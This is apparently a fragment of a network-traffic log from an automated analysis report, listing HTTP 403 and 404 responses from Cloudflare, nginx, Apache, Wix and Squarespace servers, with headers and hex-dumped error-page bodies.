                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:21 GMTContent-Type: text/plain; charset=UTF-8Content-Length: 16Connection: keep-aliveX-Frame-Options: SAMEORIGINReferrer-Policy: same-originCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=KrUvl8KDJ28NXE%2FLMDNVea7jiW49M7SHWLkG1skaW2mXB74C4oUn6CdkqXj63%2BMZAr9BAoWJt935CxbcHgxIVU3eMo5vOCrZjJehCEHS2MRBJfjpCnZtpRSWh5RhUMIN"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff59085b7918e0-FRAData Raw: 65 72 72 6f 72 20 63 6f 64 65 3a 20 31 30 32 30 Data Ascii: error code: 1020
                      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 31 May 2023 12:51:20 GMTContent-Type: text/htmlContent-Length: 19268Connection: keep-aliveServer: ApacheLast-Modified: Fri, 13 May 2022 08:04:11 GMTAccept-Ranges: bytesData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 45 72 72 6f 72 20 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 20 20 68 74 6d 6c 2c 62 6f 64 79 2c 68 31 2c 70 20 7b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 62 6f 64 79 2c 68 74 6d 6c 20 7b 0a 20 20 20 20 20 20 20 20 68 65 69 67 68 74 3a 20 31 30 30 25 3b 0a 20 20 20 20 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 2d 61 70 70 6c 65 2d 73 79 73 74 65 6d 2c 20 42 6c 69 6e 6b 4d 61 63 53 79 73 74 65 6d 46 6f 6e 74 2c 20 59 61 6b 75 48 61 6e 4a 50 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 e3 82 b7 e3 83 83 e3 82 af 2c 20 22 48 69 72 61 67 69 6e 6f 20 53 61 6e 73 22 2c 20 22 e3 83 92 e3 83 a9 e3 82 ae e3 83 8e e8 a7 92 e3 82 b4 20 50 72 6f 4e 20 57 33 22 2c 20 22 48 69 72 61 67 69 6e 6f 20 4b 61 6b 75 20 47 6f 74 68 69 63 20 50 72 6f 4e 22 2c 20 56 65 72 64 61 6e 61 2c 20 4d 65 69 72 79 6f 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 66 66 66 3b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 30 33 32 33 30 3b 0a 20 20 20 20 20 20 7d 0a 0a 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 40 6d 65 64 69 61 20 73 63 72 65 65 6e 20 61 6e 64 20 28 6d 69 6e 2d 77 69 64 74 68 3a 20 36 34 30 70 78 29 20 7b 0a 20 20 20 20 20 20 20 20 2e 63 6f 6e 74 61 69 6e 65 72 20 7b 0a 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 31 30 30 70 78 20 33 30 70 78 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 20 20 6c 65 74 74 65 72 2d 73 70 61 63 69 6e 67 3a 20 30 2e 30 35 65 6d 3b 0a 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 2e 34 72 65 6d 3b 0a 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 20 32 30 70 78 3b 0a 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 61 20 7b 0a 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 34 37 45 46 30 3b 0a 20 20 20 20 20 20 7d 0a 2
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:21 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: keep-aliveCache-Control: max-age=15Expires: Wed, 31 May 2023 12:51:36 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=meZ53BiSCElJJoONaAj8wAvwYR9KvJ%2Fp3M5LNywTKXpvzvnO7HV2VXmf5SEcY7OnfxAholnh1A4hFpof1%2FVJaRLHpPfSXyMF%2Bk5Rhwlltl6xDjFl0fE2CZFKes%2BBbg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}expect-ct: max-age=86400, enforcereferrer-policy: same-originx-content-type-options: nosniffx-frame-options: SAMEORIGINx-xss-protection: 1; mode=blockServer: cloudflareCF-RAY: 7cff590cfa839072-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 31 61 30 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 67 74 20 49 45 20 38 5d 3e 3c 21 2d 2d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 41 74 74 65 6e 74 69 6f 6e 20 52 65 71 75 69 72 65 64 21 20 7c 20 43 6c 6f 75 64 66 6c 61 72 65 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 Data Ascii: 11a0<!DOCTYPE html><!--[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]--><!--[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]--><!--[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]--><!--[if gt IE 8]><!--> <html class="no-js" lang="en-US"> <!--<![endif]--><head><title>Attention Required! | Cloudflare</title><meta charset="UTF-8" /><meta http-equiv="Content-Type" content="text/html; charset=UTF-8" /><meta http-equiv="X-UA-Compa
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:22 GMTContent-Type: text/htmlContent-Length: 548X-Seen-By: GXNXSWFXisshliUcwO20NXdyD4zpCpFzpCPkLds0yMf498VbANTSyYg//oIwpa8Y,qquldgcFrj2n046g4RNSVL5pznunIc8dqFlAvDKHESQ=X-Wix-Request-Id: 1685537482.196160710234115867X-Content-Type-Options: nosniffServer: Pepyaka/1.19.10Via: 1.1 googleData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 31 May 2023 12:51:23 GMTContent-Type: text/htmlContent-Length: 552Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6f 70 65 6e 72 65 73 74 79 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>openresty</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:23 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:23 GMTServer: Apache/2Content-Length: 199Content-Type: text/html; charset=iso-8859-1Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 70 3e 59 6f 75 20 64 6f 6e 27 74 20 68 61 76 65 20 70 65 72 6d 69 73 73 69 6f 6e 20 74 6f 20 61 63 63 65 73 73 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>403 Forbidden</title></head><body><h1>Forbidden</h1><p>You don't have permission to access this resource.</p></body></html>
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:25 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: same-originPermissions-Policy: accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()Referrer-Policy: same-originX-Frame-Options: SAMEORIGINcf-mitigated: challengeCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:00:01 GMTReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Cg0izHI531qd%2BMqzLX%2FOBtYKP63n%2FVULa%2BmKixPO2giRQ2oELcQ%2F1UB%2F8S3K2weqJ7ji9O79hvpVvdbYsugKUyhBW7wmxYfMHzpLZ5ZjWb3LvF9ijLAkAUF1fw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff592388df8fd4-FRAalt-svc: h3=":443"; ma=86400Data Raw: 31 39 32 35 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 Data Ascii: 1925<!DOCTYPE html><html lang="en-US"><head> <title>Just a moment...</title> <meta h
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenCache-Control: no-cache, must-revalidateContent-Length: 77561Content-Type: text/html; charset=UTF-8Date: Wed, 31 May 2023 12:51:25 UTCExpires: Thu, 01 Jan 1970 00:00:00 UTCPragma: no-cacheServer: SquarespaceX-Contextid: gIda2Hxm/2dJnVXZ5Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 77 68 69 74 65 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 74 6f 70 3a 20 35 30 25 3b 0a 20 20 20 20 6c 65 66 74 3a 20 35 30 25 3b 0a 20 20 20 20 74 72 61 6e 73 66 6f 72 6d 3a 20 74 72 61 6e 73 6c 61 74 65 28 2d 35 30 25 2c 20 2d 35 30 25 29 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6d 69 6e 2d 77 69 64 74 68 3a 20 39 35 76 77 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 68 31 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 2e 36 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 31 39 31 39 31 39 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 31 31 70 78 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 2e 34 65 6d 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 7d 0a 0a 20 20 6d 61 69 6e 20 70 20 61 20 7b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 61 33 61 33 61 3b 0a 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 3
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Wed, 31 May 2023 12:51:25 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: keep-aliveCache-Control: private, no-cache, no-store, must-revalidate, max-age=0Cf-Railgun: direct (starting new WAN connection)Pragma: no-cacheVary: User-Agent,User-AgentX-Turbo-Charged-By: LiteSpeedCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=f7wZ4I6MvyDB3C5EcpN%2FQF0HaDHViyUxOp8dg8RIS8vL3GZzwuZ94i8CKHJ2ADL9CrjjYPjlTzMbdG49UvXJtC0jTIhVkhmYyggSrngdZlpL00oHXGNZwRiiPApeqJNtUUc%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 7cff5925abe5bb65-FRAalt-svc: h3=":443"; ma=86400Data Raw: 34 62 66 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 33 20 46 6f 72 62 69 64 64 65 6e 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 Data Ascii: 4bf<!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 403 Forbidden</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"><h1 style="margin:0; font-size:150px; line-height:150px;
                      Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Wed, 31 May 2023 12:51:25 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 318Connection: keep-alive
